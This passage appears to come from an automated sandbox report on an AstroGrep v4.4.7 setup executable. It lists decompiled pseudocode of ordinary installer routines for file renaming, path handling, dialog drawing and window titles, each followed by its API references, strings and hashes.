										E0040595D(_t25 + _t47, 0x42b1f8, _t38);
										SetFilePointer(_t49, 0, 0, 0);
										E00405A49(_t49, _t47, _t43 + _t38);
										GlobalFree(_t47);
										goto L18;
									}
									_t40 = _t47 + _t43;
									_t32 = _t40 + _t38;
									while(_t40 > _t50) {
										 *_t32 =  *_t40;
										_t32 = _t32 - 1;
										_t40 = _t40 - 1;
									}
									_t25 = _t50 - _t47 + 1;
									_t49 =  *(_t54 + 0x18);
									goto L17;
								}
								lstrcpyA(_t47 + _t43, "[Rename]\r\n");
								_t43 = _t43 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E004059A2(_t45, 0, 1));
					_t13 = GetShortPathNameA(_t45, 0x42b5f8, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						goto L3;
					}
				}
				return _t13;
			}



















                                                                                                            0x00405a78
                                                                                                            0x00405a87
                                                                                                            0x00405a8d
                                                                                                            0x00405a9e
                                                                                                            0x00405ac6
                                                                                                            0x00405ad1
                                                                                                            0x00405ad5
                                                                                                            0x00405af5
                                                                                                            0x00405afc
                                                                                                            0x00405b06
                                                                                                            0x00405b13
                                                                                                            0x00405b18
                                                                                                            0x00405b1d
                                                                                                            0x00405b21
                                                                                                            0x00405b30
                                                                                                            0x00405b32
                                                                                                            0x00405b3f
                                                                                                            0x00405b43
                                                                                                            0x00405bde
                                                                                                            0x00000000
                                                                                                            0x00405b59
                                                                                                            0x00405b66
                                                                                                            0x00405b8a
                                                                                                            0x00405b8e
                                                                                                            0x00405bad
                                                                                                            0x00405bb1
                                                                                                            0x00405bb1
                                                                                                            0x00405bb3
                                                                                                            0x00405bbc
                                                                                                            0x00405bc7
                                                                                                            0x00405bd2
                                                                                                            0x00405bd8
                                                                                                            0x00000000
                                                                                                            0x00405bd8
                                                                                                            0x00405b90
                                                                                                            0x00405b93
                                                                                                            0x00405b9e
                                                                                                            0x00405b9a
                                                                                                            0x00405b9c
                                                                                                            0x00405b9d
                                                                                                            0x00405b9d
                                                                                                            0x00405ba5
                                                                                                            0x00405ba7
                                                                                                            0x00000000
                                                                                                            0x00405ba7
                                                                                                            0x00405b71
                                                                                                            0x00405b77
                                                                                                            0x00000000
                                                                                                            0x00405b77
                                                                                                            0x00405b43
                                                                                                            0x00405b21
                                                                                                            0x00405aa0
                                                                                                            0x00405aab
                                                                                                            0x00405ab4
                                                                                                            0x00405ab8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405ab8
                                                                                                            0x00405be9

                                                                                                            APIs
                                                                                                            • lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C0B,?,?), ref: 00405AAB
                                                                                                            • GetShortPathNameA.KERNEL32 ref: 00405AB4
                                                                                                              • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                              • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                                                            • GetShortPathNameA.KERNEL32 ref: 00405AD1
                                                                                                            • wsprintfA.USER32 ref: 00405AEF
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
                                                                                                            • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
                                                                                                            • GlobalFree.KERNEL32 ref: 00405BD8
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF
                                                                                                              • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,80000000,00000003), ref: 004059A6
                                                                                                              • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                            • String ID: %s=%s$NUL$[Rename]
                                                                                                            • API String ID: 222337774-4148678300
                                                                                                            • Opcode ID: 993d4f636ac995a784a87da88db713d62b233df57c37c449c1136705115a63d5
                                                                                                            • Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
                                                                                                            • Opcode Fuzzy Hash: 993d4f636ac995a784a87da88db713d62b233df57c37c449c1136705115a63d5
                                                                                                            • Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00405F9A, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00405F9A(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040580E(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004057CC("*?|<>/\":", _t5))) == 0) {
							E0040595D(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                            0x00405f9c
                                                                                                            0x00405fa4
                                                                                                            0x00405fb8
                                                                                                            0x00405fb8
                                                                                                            0x00405fbe
                                                                                                            0x00405fcb
                                                                                                            0x00405fcb
                                                                                                            0x00405fcc
                                                                                                            0x00405fce
                                                                                                            0x00405fd2
                                                                                                            0x00405fd4
                                                                                                            0x00405fdd
                                                                                                            0x00405fdf
                                                                                                            0x00405ff9
                                                                                                            0x00406001
                                                                                                            0x00406001
                                                                                                            0x00406006
                                                                                                            0x00406008
                                                                                                            0x0040600a
                                                                                                            0x0040600e
                                                                                                            0x0040600f
                                                                                                            0x00406012
                                                                                                            0x0040601a
                                                                                                            0x0040601c
                                                                                                            0x00406020
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406026
                                                                                                            0x0040602b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040602b
                                                                                                            0x00406030

                                                                                                            APIs
                                                                                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                                            • CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                                            • CharNextA.USER32(?,"C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                                            • CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                                            Strings
                                                                                                            • *?|<>/":, xrefs: 00405FE2
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B
                                                                                                            • "C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" , xrefs: 00405FD6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: "C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 589700163-2861144667
                                                                                                            • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                                            • Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
                                                                                                            • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                                            • Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00403F7B, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00403F7B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                                            0x00403f8d
                                                                                                            0x00404021
                                                                                                            0x00000000
                                                                                                            0x00404021
                                                                                                            0x00403f9e
                                                                                                            0x00403fa2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403fa8
                                                                                                            0x00403fb1
                                                                                                            0x00403fb4
                                                                                                            0x00403fb4
                                                                                                            0x00403fba
                                                                                                            0x00403fc0
                                                                                                            0x00403fc0
                                                                                                            0x00403fcc
                                                                                                            0x00403fd2
                                                                                                            0x00403fd9
                                                                                                            0x00403fdc
                                                                                                            0x00403fdf
                                                                                                            0x00403fe1
                                                                                                            0x00403fe1
                                                                                                            0x00403fe9
                                                                                                            0x00403fef
                                                                                                            0x00403fef
                                                                                                            0x00403ff9
                                                                                                            0x00403ffe
                                                                                                            0x00404001
                                                                                                            0x00404006
                                                                                                            0x00404009
                                                                                                            0x00404009
                                                                                                            0x00404019
                                                                                                            0x00404019
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                            • Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
                                                                                                            • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                            • Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00404813, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00404813(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                            0x00404821
                                                                                                            0x0040482e
                                                                                                            0x00404834
                                                                                                            0x00404872
                                                                                                            0x00404872
                                                                                                            0x00404881
                                                                                                            0x00404888
                                                                                                            0x00000000
                                                                                                            0x0040488a
                                                                                                            0x00404836
                                                                                                            0x00404845
                                                                                                            0x0040484d
                                                                                                            0x00404850
                                                                                                            0x00404862
                                                                                                            0x00404868
                                                                                                            0x0040486f
                                                                                                            0x00000000
                                                                                                            0x0040486f
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
                                                                                                            • GetMessagePos.USER32 ref: 00404836
                                                                                                            • ScreenToClient.USER32 ref: 00404850
                                                                                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
                                                                                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                            • Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
                                                                                                            • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                            • Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00402B7F, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00402B7F(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414418; // 0xe817a
					_t11 =  *0x420424; // 0xe817e
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                                            0x00402b8c
                                                                                                            0x00402b9a
                                                                                                            0x00402ba0
                                                                                                            0x00402ba0
                                                                                                            0x00402bae
                                                                                                            0x00402bb0
                                                                                                            0x00402bb6
                                                                                                            0x00402bbd
                                                                                                            0x00402bbf
                                                                                                            0x00402bbf
                                                                                                            0x00402bd5
                                                                                                            0x00402be5
                                                                                                            0x00402bf7
                                                                                                            0x00402bf7
                                                                                                            0x00402bff

                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                                                                            • MulDiv.KERNEL32(000E817A,00000064,000E817E), ref: 00402BC5
                                                                                                            • wsprintfA.USER32 ref: 00402BD5
                                                                                                            • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                                                            • SetDlgItemTextA.USER32 ref: 00402BF7
                                                                                                            Strings
                                                                                                            • verifying installer: %d%%, xrefs: 00402BCF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-82062127
                                                                                                            • Opcode ID: 006cffcf8240dfc76d7e4b6e7b59e3417ee2623043ecf049c00372ee4aca6d42
                                                                                                            • Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
                                                                                                            • Opcode Fuzzy Hash: 006cffcf8240dfc76d7e4b6e7b59e3417ee2623043ecf049c00372ee4aca6d42
                                                                                                            • Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00401D38, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E00401D38() {
				void* __esi;
				int _t7;
				signed char _t13;
				struct HFONT__* _t16;
				void* _t20;
				struct HDC__* _t26;
				void* _t28;
				void* _t30;

				_t26 = GetDC( *(_t30 - 8));
				_t7 = GetDeviceCaps(_t26, 0x5a);
				0x40a818->lfHeight =  ~(MulDiv(E00402A1D(2), _t7, 0x48));
				ReleaseDC( *(_t30 - 8), _t26);
				 *0x40a828 = E00402A1D(3);
				_t13 =  *((intOrPtr*)(_t30 - 0x18));
				 *0x40a82f = 1;
				 *0x40a82c = _t13 & 0x00000001;
				 *0x40a82d = _t13 & 0x00000002;
				 *0x40a82e = _t13 & 0x00000004;
				E00405D51(_t20, _t26, _t28, "MS Shell Dlg",  *((intOrPtr*)(_t30 - 0x24)));
				_t16 = CreateFontIndirectA(0x40a818);
				_push(_t16);
				_push(_t28);
				E00405C8D();
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                                                            0x00401d41
                                                                                                            0x00401d48
                                                                                                            0x00401d63
                                                                                                            0x00401d68
                                                                                                            0x00401d75
                                                                                                            0x00401d7a
                                                                                                            0x00401d85
                                                                                                            0x00401d8c
                                                                                                            0x00401d9e
                                                                                                            0x00401da4
                                                                                                            0x00401da9
                                                                                                            0x00401db3
                                                                                                            0x00402513
                                                                                                            0x00401561
                                                                                                            0x00402877
                                                                                                            0x004028d2
                                                                                                            0x004028de

                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401D3B
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                                            • ReleaseDC.USER32 ref: 00401D68
                                                                                                            • CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID: MS Shell Dlg
                                                                                                            • API String ID: 3808545654-76309092
                                                                                                            • Opcode ID: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                                                                            • Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
                                                                                                            • Opcode Fuzzy Hash: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                                                                            • Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00403974, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00403974(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405CA6(__ecx, "1033");
				while(1) {
					_t26 =  *0x42e444;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x42e410 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42e440;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42dbe0 = _t18[1];
					 *0x42e4a8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42dbdc = _t23;
						E00405C8D(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x429848, E00405D51(_t13, _t24, _t26, "AstroGrep v4.4.7 Setup", 0xfffffffe));
						_t11 =  *0x42e42c;
						_t27 =  *0x42e428;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405D51(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                                                                            0x00403978
                                                                                                            0x0040397d
                                                                                                            0x00403983
                                                                                                            0x00403988
                                                                                                            0x00403988
                                                                                                            0x00403990
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00403998
                                                                                                            0x004039a0
                                                                                                            0x004039a2
                                                                                                            0x004039a8
                                                                                                            0x004039a8
                                                                                                            0x004039aa
                                                                                                            0x004039b6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004039ba
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004039bc
                                                                                                            0x004039c1
                                                                                                            0x004039ca
                                                                                                            0x004039d0
                                                                                                            0x004039d5
                                                                                                            0x004039e9
                                                                                                            0x004039f4
                                                                                                            0x00403a0c
                                                                                                            0x00403a12
                                                                                                            0x00403a17
                                                                                                            0x00403a1f
                                                                                                            0x00403a40
                                                                                                            0x00403a40
                                                                                                            0x00403a40
                                                                                                            0x00403a21
                                                                                                            0x00403a23
                                                                                                            0x00403a23
                                                                                                            0x00403a27
                                                                                                            0x00403a2e
                                                                                                            0x00403a2e
                                                                                                            0x00403a33
                                                                                                            0x00403a39
                                                                                                            0x00403a39
                                                                                                            0x00000000
                                                                                                            0x00403a23
                                                                                                            0x004039d7
                                                                                                            0x004039dc
                                                                                                            0x004039e5
                                                                                                            0x004039de
                                                                                                            0x004039de
                                                                                                            0x004039de
                                                                                                            0x004039dc

                                                                                                            APIs
                                                                                                            • SetWindowTextA.USER32(00000000,AstroGrep v4.4.7 Setup), ref: 00403A0C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: TextWindow
                                                                                                            • String ID: "C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" $1033$AstroGrep v4.4.7 Setup$AstroGrep v4.4.7 Setup
                                                                                                            • API String ID: 530164218-3845018338
                                                                                                            • Opcode ID: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                                                                            • Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
                                                                                                            • Opcode Fuzzy Hash: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                                                                            • Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9
                                                                                                            Uniqueness

